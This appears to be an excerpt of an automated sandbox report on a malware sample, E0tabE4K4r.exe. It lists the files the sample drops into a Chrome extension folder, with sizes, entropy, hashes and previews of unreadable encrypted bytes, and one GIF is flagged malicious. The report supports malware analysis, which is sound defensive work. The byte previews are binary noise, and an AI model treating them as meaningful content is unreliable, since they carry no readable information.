                                                                                                                                                  Preview:.f.5...E-...=.OMj.#.).s.=0w....$...w9. ..G..;.d...O*....F:X.m.....D.H^..._....../Bt,/.......%..i.2..*7...m......-.1..WL....E\M._.@.o}.R.`.....e...........}.u...|.D..7...4..%.....p...4....U.sE..hO.H....S..yh.....g.`... .+..V.v`7w..N)Z.N]...%),\".,...#3.$..0.q*.g*i.}.Eg.....R..P..q8.3...@.....lTz. ..c....W.c...0Y.q....o...D.6q2.nP....*..l4...+VO..z.8D.]....JD.+.....h....{W.F<..%C.p....?U.t;..GY..^..>}..Btv.!.o1.f.@.... .)..L....?o~a...e....-,.Z...|...G.x%...u...0.J.V....6.d..<[..(..;#\96.k..`..5~.\\..&.<....8....~..D......J.=....1,.._n6..7..&@O5q..Ao..ln\."...U..">.b.vB.. m.AGL.=*..IDC}...e..3HW...........0*.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):651
                                                                                                                                                  Entropy (8bit):7.623438492713634
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kIQp0CsTJop5pfh3+0iHyn9rEcMgISidfTKIJPmWXtOQp4SUdNcii9a:LQaE/tyy9rMT7KIhdAQpf2bD
                                                                                                                                                  MD5:D40B5E83F17EDE26327E5E7E134A896E
                                                                                                                                                  SHA1:1CE3277F37F4794F36A1FB176E2B5E0D73C99F37
                                                                                                                                                  SHA-256:6A5E1A536711870C3F55EF0DE28C3C5BB5F783A816E464894F2AC132CB863285
                                                                                                                                                  SHA-512:A4495B00E6D51A81CC89F574696881E8222214C65867A8A87E4B1E844C48B125475E1230B37106845E60A86871D7B84F14AF86C6412A172739FE3BB39AC39B22
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/1..i.....F..o...F(...:.8R.V.)...iJ*(......T....V..#.5.'...7.3....FJ.7|$..-....*$..w...}z.t.$."Js..#.Jc....................0.PkQ.......1.c..d?.p...]...Y.J{...h...U.W...U..q...:..Z.........u.T.......M..v....X..:k.X..#g...p.?....KzG.H...~<....Yp......).1.^.\7......;9z.r.5.......)..d^~.\8.k...<.a.~E......d.2...]...g.b....o.....P-..".8...R(.....'.y...6..OV......KV..M.3....-.$A.C..gK.T.{k'...!_...._.0/0.=..3$...$.......u..s.X.^.\s.78....^ ......t9qo...m.?.I{,.m.9.+.0...L..H.Q..._....A...X..6..-.._..0..\_1#t0..'.&.F.......{M.E.h~..u.r.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11551
                                                                                                                                                  Entropy (8bit):7.983329514193988
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ntrdK2kyLhSX1xpnE7zNaIRhUaHZ5mbSv0rHZpng7PBKeAPBfgoBKRoc1eSxVwcl:trdK2kMuWRhUiCr5pAPBCPOoBZc9xVsy
                                                                                                                                                  MD5:9955B434CB2C8DB6FE4DC62142FF87E4
                                                                                                                                                  SHA1:76D7416C062723A3E07685D1D372DEA1C3BFD515
                                                                                                                                                  SHA-256:F4BFA7F020568F672BA8D6579229CC55B7FA34B4EDAE87812D0F28905DA13967
                                                                                                                                                  SHA-512:E97A7AC59EE6E4612D332609CE98E97AC8DD461C9055C35B3AD8165B62CD6A44A515A38E4E720B2E73CA45628FB9C1DAAA63E99738F274D5EE13ACAB8B2BE252
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"filb%.y..&...Q].^h%0...4`...z.~..V....,..;.....q}.bYy.".f..4.....;v`...}.E#.4S.....Y..s..^+1q$...,.Bo.*jj$......0....9j......)m.=......#7e........8j!,b..~.......7....".&.pr^..w-...K..At.T1..o..^G.h...g.%...z.}...L..).?.r0...l.c..e9.(x.RB&./.0r.$.C.,4.Zq.....B...tU:.+Ys...=f...b6Q...w7.1.........fj...E.k..U..4f.._.Kh..8..<(....~..V.BCe.=.C.[.(]Q......6U...Z..b....!.X....[hMx.Q..."....9..@1p.o....4..*.4.dX.&..X#.HwB{.-./.I.&..ml.0...b......C..~.=.#..S..*.G....P.O.}..O..Ps...M.2.....3 [s........4.i.one...f....g0...05V..d..Y+.._4....S3GX3hf.J.rt..!....5.(m..L.X...pw.C7.SM.....7......36...'.....b...j^...)U...9I.j....y....c.8.{.P...6..<.....]G.H...}..N|....IL9x"...[D..)......@........py>3E..m.Ac...G....|.Z.v.D...9.H.O....E...F..eD..E_.......ZZ5.* .j.3..m.......(.)/n..1.NK.....Gbx......T/v.K..t...S._....u..2....7....oe...0Y{...o....z!?..2........2.NS..#.....b......'..\.'...*...J^....R%.Y.J...f0...:I....V..E.....unp....@}zI3.:-.Tj.qV.OZ..+.Uk.

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\verified_contents.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8114
                                                                                                                                                  Entropy (8bit):7.977977943351424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:0OWNmA9ENZcbLbdfGV3643q3WzbHESK0MHQjhp5wn:ReENuLbEIBAbdK0S06n
                                                                                                                                                  MD5:6B4AFEC65C6400C027DAEE12BBAA9333
                                                                                                                                                  SHA1:04CA3136F629F9EE082F7B20A33ED42060DD0391
                                                                                                                                                  SHA-256:CC107F0834D73EF71DA35D467911372AE4E16BE5A0F84D90FC75294BAABCE897
                                                                                                                                                  SHA-512:8A22D3BDA3E15948AF083BCA6EF32655E1FC0066E287C1BC74FE1A2C9CD6D9F2F4ABE3A4CEADC6467399157E10D5386D52AC644826D21A8F5D76A982F15096E4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{"deZ....j..|.[.md.wp.q.._.K..D.R...:...........!Q .':.G ........37.&E..C.+....0...4`....C.a5zm.].}...d.a..I%B.....VX...r.^.]........'.o|p5@y.k.A.2#.R.~s...&i.v...H..f....N[B./w.F.qLG.gwO=....B.._..4.$.a$ ..}.9.6.*+..n....9........).;V.X...,....N.....h....M......t....y.1..%....;.~Gc.e....I\%:...;...Lg(r}...r.../.....i........Z...W..|.3..j"...U.|...&..}#n...u~|k..e&..3..I.k.,-.=.>..c.....r.q....gL.o..l..h.XK.HS@Gb.?dR.<c...G.C...c.(....?.(....ai......VV..%....n."W#H.C..p@7<CB..>&..X..o."]p..._.xs.`m..ia'm...v]X...._.(...f ..G..4M.r.K.......{\l.]...#.,....:......*.....R......M.e.@...2....,...V.<....+......[}.O...jB........u.-..6!.6.-D.F.a...F&Z..........Vq...v.B1.d~...C.%..e._......RI..a$vm..5.......u..L..iZ.P.1.."+..\..O.lc.<.4.,.)..Y.3l....x..`.cr..gV......?.5...}..gQ.>..t.0.ck.:..}.....#.2`...b....|.e.L.'...O.....E)..<....0..=y.....3Ul.a.[..G....:.W.....6.,6gxT._(.>..$e.T.w....Jf2'.......G....YJ#~../...]<...1i?......[O.+.}.L.n.7..~..

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):544977
                                                                                                                                                  Entropy (8bit):6.602005074538425
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:eEsqwKLNEnB8Rc1bcer8LRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+p:/NEnBQQ+
                                                                                                                                                  MD5:5B580B0984EFC75234B6A18844DE0920
                                                                                                                                                  SHA1:10A2732BA1F768A16C08CA7F0E391E4AA9918F57
                                                                                                                                                  SHA-256:1E33C2595A3F902C8FB04E70790CA9E423C6E46F6B089EB3409B8B1ABA34719A
                                                                                                                                                  SHA-512:75C132C37A3E9CA9380A9630E8E9FF1D18566776950E5450918C70FCDA21404A5B3378B5A84F18E5EC9015E334B00033FA37121F957E25495B60566EE119E132
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.. a#D...9$..4..N......H....h.%"..w..o(f..E.J.....d.....5.o+F...Wa.;....A...Ze......n..E.|.....v..N.S.S.........,u.../_.5w...C......{.....C.l..L....,..,.H=;...+....)......2...L...,.C)...b.%..|R.7W)s..0.A...h.$:/.~j........|.......Do....7U...7S[..%..-......e...E...... :....l .8,oz#A./.............W.ak.p.....F....v.=T...+....Mr.W...N.......x.....(..3...16C^....t@.....~Hb...<..Q..E...>fR..t.n.2.bR..1.RJ.x...N..yJ.....J.v.\.\a...r.:/D^E.i@.^.?.s...cjb....Rf(.....A~.....+.B........L...0.m.....c..c ....?...7...r@..W.Xw.?^......%Z..H5.L.v..l..\.....4`at92..d.yCx...6Z..s...U.T..5VW.x..D..z.......}.....ts....E(..e.GT..u.(y%.L%....d.B....^..~........f....!....hQf}xV!.].Eu_;.....G.5c%..9........1....F.0......_.`};...D..g...ae`,..8.Am......:g.3............L......%..p..A-KL`.b......5sD..j.Q..vR|......_..}&./.N.m..2.Sy0K5.A2..D.1wQ..DI.\.3?f.....-....9T.lD....3..D.m..w<...A.....n.... ..a.....2.F..K,..j..U_...=..Ih.M...a..}..B...3..V......

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):261650
                                                                                                                                                  Entropy (8bit):7.487741363635122
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:8zSwxJs+u9kp8iliq4mlZBH9eR5xxx9FNNsZ9Dd/ceh:8PxJsDkNcKgbxRFIBdX
                                                                                                                                                  MD5:FD0CCA8EE5537121FE5EE4F6747F56DA
                                                                                                                                                  SHA1:9DE56A4616337747F0218EBF09EB7189AEF152DD
                                                                                                                                                  SHA-256:E83350C8915A1583E14B2F1EDB9DDDAF4A8CA83DB29CCE5D1F1D9F3790122AC1
                                                                                                                                                  SHA-512:6CCDC519812C44A96CBC914CAB93B01F9AB2A9BD6FAE5544E0B8C4C02B73E40AA1D3A4A62AF19966D6C9B162FAF92BE5BB308DC68D6BB9FA20EED44E3370985A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.. .l..j.n....rPc\Z..=..g...*J9.{....Y.M.r..'..O=z;...FaU.!_....a.R.....BK.7..G}...*6..}.^....Xy..Qa...#.x....I.............|e...V..2yi..^u..V?.d.>...\..Q....A.l^...r.u..&.NF..M8.yw....Q..>nd..W..N5...>......{...-.Z....J.I..VJ(9...'.=n..pz..nZ.g.3K..J6.....E,dB.p..n%...5......a..I.s.......Y,..-y-......f%,+....tq..q.D+.B.K.zA.=.q5...9..6...^.........]...j.i.wI...J.3$?.K...M..Q..5.S..}.....J..%...... ...!...)5.&...J...lEl..H..pIkg.4..9.....Q..C...c0s..M....&.xH..2.>..V._.h|}...........~..!l ..^...;.0#.%....d..=....Z.<.E.<.W...$.C[w<8Nq.....i.....nm..]Z.@V.Y...;...k.m.?.x.K....V....\..=F...m.2...c..i......<.&.Z/....M.T.D.......yK5.........8..a..i..u..6..H.}.C..u..#......z....Giw.......S.+.+I3M..S.....zN..q..Z.A.Y.H...G.....Zo.4.]..(.tL....6...i4 .+..G.&.B......."o.....;.....U(W..S..*...w..Gu...x.....S.]..B..}.N..%.Fi.....o..%...G...r!..-..c<.T.e.;}........mC..-......*..)O.R..U.P..........8...o~..j(.;..GL.......V|..$.,g..Ws.....o.5..;?

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\craw_window.css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2075
                                                                                                                                                  Entropy (8bit):7.905621361331478
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:L1tuQlOdBLD0M71lOh4+KEc3A/MhGmCZS4fjeHS2UkV1KpKBEgEHzND:L1W0Mah9K0Mp3Lr7V1MUE/Z
                                                                                                                                                  MD5:0D02A13E14CDA77429DBD0ED1AC93712
                                                                                                                                                  SHA1:FDBAF21EF592956185245DA9EBAFE02ED51170C4
                                                                                                                                                  SHA-256:720DE0FB7476E723600E00BC0DC629F84936408C4C2E631BD1BB48CB0ADEADE3
                                                                                                                                                  SHA-512:739D0FE458627FC9AED226CA7C426A197C6C980D71F8D7A989AEAB16A526AA264889A57F241A073F3C1D79DB32D0F96EA85D76847C8F1FC0008DA8B4A79F5C8D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:html,.j2&.....E^.l...%.)..^.V.].IsGY.H..T.I.....`D^.....6........2.S......u..^...8..EyT.^r...kcd.*..n...O..+....GZy}.Tb.{..w...WqIE'.BD...}....9.w.K~k...L..HM.*.......aQp(. .@....n"..(..p.%.F[<{w.xW..Y.........l........P...6U|`..g:ow..=.e.'.Y=....D.....K.V>o../...~.f.R....[.%f.$r..0.>.Z../..EB.u.............~>h..:F...{x|.x..Q.....$.3.2.)..{.0.v....BV..NU..P{...L.........um...5.WW,.W..].}.T.,W.j......;..1'.{c..mLY.CkA..@.]...+}.AC..R.B]....zU.....8..bu..zX.....~..H.s..kV..o..U..[}...%......a.EPS.b..]......x..l...+...6p.+.4...8.d~.AW+.......X..}..Y.,X.~.......^..xBAZFU...@............+:P?..).e...........B....~.Q<.....=........BB...z..."..h|.!.6...@.&.0#dj...R...4..V.S.R.G/..m{L).s97.b.T\...aM..M...V..\..Xdy...].M.W..5.g. ;....J.x..U.s..$%>......&....jf.egr.c./.....X.L>.MA=j&.i6.]57..v...P.>..6!O..f...hNcH~..\7"....|.....k..........$...t....R....|x.....MVbC>-B..J....@..?....u..C."i.........O....{R...:.-l.~F..d".f.l.s...8.~.r..Z.8...

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\craw_window.html

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1144
                                                                                                                                                  Entropy (8bit):7.8094562418608175
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BQQE9D2IBO3Jjbq4hpMPpx+4v5YdWG4F6sYBkWsGkhfN13FYdEd8xwQc2bD:BQQcD2IMZnq4haPpUjSsOfj3S+ipD
                                                                                                                                                  MD5:32E13B5562FD1AFDB5DD4453F244EEC5
                                                                                                                                                  SHA1:5AFF38FFEDC85458F4DF69AB94AB507C7C361C0A
                                                                                                                                                  SHA-256:866C837C36BE388D724626BACA8F7982A90B9735EEC3ED34F382FBF36BF27CBE
                                                                                                                                                  SHA-512:9D89CC51506B311B73E91299355190ACF5FD2EC0CADCB447712B663204B114879E901DB8A7036D04B6862DC340472D6DC2A2BEDABFD1A26A6956A5AE8AC526BD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<!DOCL..k.g@e?R.q.......=.x.d.=.6..P8'l..t....'.....Y.'|.Q.J.?.I...V.%W........Y....R.. q..v...D..W]...Y\{V/q,.K.]..}..N.P.sNw...y+`'..W.~.&..T0.!u...U.B.Q..d)....9......:..Pc.;:._.<....>.~..pnM).C.X.(.1.tC;..oY.A...l._....}.Q.....d.>.t.......p.....\.S.....p.r.q...t[.............hxLa..}.v[.....*E.b..=..$<v.-.Px>.p)z.p..s.?+#].._.g..sG..n.}..!XzJ.]..I..7.......+)..r.Tue..lR.2......C....E.`Q..yU...p:.}....l.NV.p...Q..............^...Ma-.:...Lxq.K9K>.Q..\/...VL*..L... .......g..E......~....~O..X.[....&.J.{.IJ.v.%.`"$L..8.L=.9.f.P...[........g.0.'...c9..su......3.Wa.g.8.oo..yZ....x.C sl..Y.kS.xrm^Y..A.6..F.Y2...?.b..)8.h.$=.].n.W.p.3W.3t..xy4..X=..r}.........v).....X....b...t......dt/xl.?.....$........,0^.O).5.N.M.0(tJt......x.E..k.1..6..m.(..g....w...p1.......*7...A.Z.....%.F-.UB./.=Y......~.AT>7A..n.%..[...!.'..L[.d...z.{..D.J`....<i..|b..o....0.....c.,.`.......'n..t8..)PN...'..:...@.dX...r4.0...W+...<.S...B.v.t.../..}XCD%8..cN5.Pst.......

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:GIF image data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):70698
                                                                                                                                                  Entropy (8bit):7.997469394230741
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:W9OuLijY6SXB+waYYkoXKS9bUg+FBgAve/5Yk0x:WUueNZkof5yBgWefS
                                                                                                                                                  MD5:959256756179CE71FD06CEC613420002
                                                                                                                                                  SHA1:C942C3C61C6E6AB6C076BD508EA050BB5CF95ABA
                                                                                                                                                  SHA-256:74D6129A9DE9333DADEFD7998D35FD0FC55EBA039E8C9CA7195D5E3DFB97B84C
                                                                                                                                                  SHA-512:4794FB4A95FA6B24B7A83A237B32EB13CDD0D414F4972BCA4E63C4D2C53406D30B48A55EA88F2675BEDB10F0BE9FB76536DDC415A2E9733E9C9C6C3383E9D040
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:GIF89.n.D.._g..+v....... ..~t2.u...%z.....C|A..Y.m..V\8.....(...y.E.Tn$F...!k.....,..N..."...p^..n.pa(....Q.....#.....v..E.....s...6d.h.R...h......x....%...+Y.....@....%......rB}?.!.h...."...+..a# L{.[..T-l&_a.*.....w......Mk..w....a$..C..d.h:/..6.8..I..^..U.C.n..?.s`._6f....;.....v%}(I3r..b.........W.....o..b2[.?.JmLmo>....S.i=.P.C..> Z.e.xd.....V9.W.A......Dx...W.~.'$6..-....Ce.(...vQ}O....S._..r.8..:}.]\=........d..vXv....sK.....>...,c|.0G.V.!..&..c>._..mp...Aj,.K.Cb0d.A....pA<.>`.Ln(..I'..(...".=\.Y.H..h.....7.. .w.}..|+....H)..+.......}.Ej..t..2...xt5.64.........[.fO|...x..Ol.{..yZ.....*/@...."-.....$!?=.......Z.M.;5<.R.....Q.."D.............y.`Y.....+..Q....B....{P...=.:2..M.%.Gj...3...:..S2K.../..)hY....#.<.JA. ...8@p..8.z...x2.T........!....X.......l.k.........Z.tl.....`..A..}o....<*?g.K3m..,..........@..{.se!C....M.....]....W.%~.hU*E{..@*..~W .!1..(b.rT.RQ...}..CTq..J.,.7t+.,?.$lF...&.Z.;..:G[....G5.(.._.L. 6s.[..=.#.

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4698
                                                                                                                                                  Entropy (8bit):7.964764784123458
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:wQe0y3QX7DYTijlEMgcsPuo0yJ0TzM+4I+pEQG+Ij03xqN4:w8y3Y7DnSMgcsAA0/bD2
                                                                                                                                                  MD5:4B29F049B133E88246A3477711605121
                                                                                                                                                  SHA1:5326E0AC1654EB996771F132C7928D412C3F67FC
                                                                                                                                                  SHA-256:3EEF4723ED8A54A4E67CB73003018EE4256C152746E962E713EB138CC6504EBA
                                                                                                                                                  SHA-512:8BE1CEF574038CC1EE297226AC9F1C0BD1882B65A65E70EB97DBD969CFF8EB40271D17F5F2A143E49439B3CFFA466A446ACD5B786FF2B6F7B0DFEBF6E5DF5E6C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG....G.s.r.k.....t.......R.z..'....o..u...q.|.?(.d?i......^}...Ha2G....8..........4..l..yb.L.QI.$..n0.?b....',R...8.zyA..PQ..%..7.|.fi.../,.;Pi..8..fx}.3..B.._.`.o~...gE.+..P..A&..-!.({#..S.8.9.QFgb..,/yh..U.&.{.he.{z.r...h..Y.......4!.]..q>tFD..X.l...I..S..M#..-'...Z..U...X..3...+......Ta...q#J........w{A....z..!/......'...X.W.k..C...nJ...%.w...W........gW.O.9<]_O..C.}=A)KB3[[..0..6v.AQ..$.s....A..r. ....3..O)R....{.......Vb.W.8[G.T...I..W..?../,.[.L.lu..s.r..u...92.Y.q1n9..=d..Q.]....f,...D.e...........J....\.d|....T....w..t...&nU..'..T5\r.8.{>.E....FK../....^.[U6(..p.{.mf...iexru.0.p{./.MgM).o..a`$....w.`.........G...&.&.....Qb!{..;..a..S..;.+Wd..E..i.......3O.....[d.|...H...........zI^O..Wi..]l.a.%.1'G...@L.t..>..B..T_.Dl.hl..-.1..|."..e..C..9.r........'.9..6..FE..F...&.Z.r...}...Q0.`.X..\`.G...M...u....`!.....9../[AM....;..=....).......F.O.{~..37|.Q...E.)....5.....e.h...tK...y....".j.C...H......C.......tU0..\.o.'.....w.^/..v.

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):892
                                                                                                                                                  Entropy (8bit):7.77302530007097
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XuhrtAjNeMDf0UhWvHpa58pMnVYWCEupr25wZF5Zj12bD:+hrtkNzDMTRa5fUEOwwZF5oD
                                                                                                                                                  MD5:22405A1ED9CF5AD32525531A5E9372C1
                                                                                                                                                  SHA1:DDA75A4F6E50EC38E8B13F77593EE1B94B4B423E
                                                                                                                                                  SHA-256:3637A86867801663A5B86B568718CA97ADE3688D3094F62C862CE85745FC45A5
                                                                                                                                                  SHA-512:562BE87D8971194CF1603BAA45712A199492BBE05F3CB03BFA673E77F9B746ED3CE146120DB25C4CF78207CA173C1D521B4DB06FF0BDF5E2E71730E3BCD6EFF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG........5gY.%.......J....g..g..........Q..(O..H.N..62m.s...?$.c.TAD....g.....+W..Jk.8...../.`P.Y?...R..s.GzPS..&F.X...NK....p8....C....{....B0.....^...=..$-m..".j...._......g:..lE.-K.F....k.q.k.t.p.EWf.n........&...._..z.'.c-@.I+.5...>.\R..%l.gm/..=..&.#}c.%)..S..N..c.R.R..9..6..?..R;.Q..1@............CULf.R.Q.M}5A.....O..(K...x8..`..X..^...#.j..,.MCv6.z...m./...j..gm...l...D"\.-j....j]9ht..Q.....8G>2....n....F...:[J.U..7.P&.,IZ.>5....'.J........}Mo..~.A]..&C&.....Z.Q.|<..)l...<.P..(.=...G..b.....i.]....P...Vb..B. .1:.|..#...P...P/I..I..~.....2!g.=...%...wSb.....v.....&.......T.........a.T9...+.fk..".....8.^...........gyx.=.dzH....D....S^...=j..v.jeW>.......d..bo.........X...:....+..D9r...s..G.^.u)(f{..'....f;.........W..J//.....{.(z.q.m(0.D.N...^.$.......*..D.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):494
                                                                                                                                                  Entropy (8bit):7.524012515401752
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nSF1v4mEfhOvtruhgfy/zi9Re1Qzzo9AGSUdNcii9a:nIMquhgfazkRe1mz0C2bD
                                                                                                                                                  MD5:576913252A8B5444E243DBE957950906
                                                                                                                                                  SHA1:9E6D47883063CD4F89C240D556173944A79E59F3
                                                                                                                                                  SHA-256:A32A29FA9E95208588BCBB8295500E8C7BB400E95657786C846B5643BAED86B9
                                                                                                                                                  SHA-512:1A3A4DF26BE8F8F992E0C3208FF7CF4EBD0EE6328BCA326719A67F61959380E49F14733E0EF1A887603214F953EA1C086DB39C4D14F91805E49A6C24D6F0BF00
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG........N..|e.x..~..^8....zme....U....}.......q.G.B....'.4...z".&.h...O..1....-......w=...wTl..<.......?!~....{.M..5...a..59@.....c\.$.W..J.@~..r..Z....Q...Hk.....(.>..n........Rp.H&.u.R...lT..A......-.<).<..k./.O.(..Ou|.r.i.)..|....w%.M/._.o.I..J.......Q..8 =h.Z.)RF..]..\ma..;....:.5)K...."....grJz...E..C..X.M.{(.C..#0Va.&[././/.0....y.L.."0.l ...s...]@."q..qV9s.K.T.B..5..>Ol...R..)?...hmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):586
                                                                                                                                                  Entropy (8bit):7.574528407873868
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:9NPrxRVXeZn4MUCRP+H1Twymusq6iYcDgEAYtuLHcl+NdRmXuqVMSUdNcii9a:rrXVk4MTmVTwfusZiYWdtUN8XuYT2bD
                                                                                                                                                  MD5:2E6149622EA7AECAA3A4D7727663BFFF
                                                                                                                                                  SHA1:C12326F2AFCC55D2275EFE4C7F09813627FD8696
                                                                                                                                                  SHA-256:CC2017567036E98BC18836CF74FF58B8EDA694FB7EE4D5CFA947350A14847BE2
                                                                                                                                                  SHA-512:AEB9A9AB8B82A0BDF8129CEBD99116CEC871F3A9868C2A50BA29DA27480EECA4529C75E6B14D1C803DF2BABA7098EC75C6B0AD1953F4D3241AA4329366D96E6A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.$..$...?>.w.[m\.`4......:.z.t...~..M...?^z.z.^..y.'..M....U...>.|BB6..8........at.uP..N...O.../".Q.!..K.j..B.CUp..|.CT..pr.X..IH^V..'.....;.....o5..i...@]../p.Ty]E.avj<....M.F.y.nH..@?.F...v...,.....16.@.?.6...k;.8.k...V...w....}..z...@=..Y.P.....@....^B..{.X.t.[.R.F..E.I.....J....J......T../G......W5'.3..UeQ.j..;.:..)..1....6..1....M....|...D.w.T....T..|I....?a.D.$....pr...j.....q.tp...oxW i....d<.X..|=1..@*..q........{..})o..^t......C<.g.Q....Y.\..yJ.....R.7...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):494
                                                                                                                                                  Entropy (8bit):7.507982037663445
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:XkCB9sJcnDoWNeq5mFyzOFyNhuNTRjeX4YoWSUdNcii9a:Xk+9sJcMWNt5SMqyPuU4j2bD
                                                                                                                                                  MD5:DF08395B3AFAF704C351A8D5B133FBDE
                                                                                                                                                  SHA1:32826435A251490950916CCD79F5A4755C23971D
                                                                                                                                                  SHA-256:FB508505E48AE0DD632657CC35D9A9671E78A1B1EBB0B31597A06DDFE9D431C7
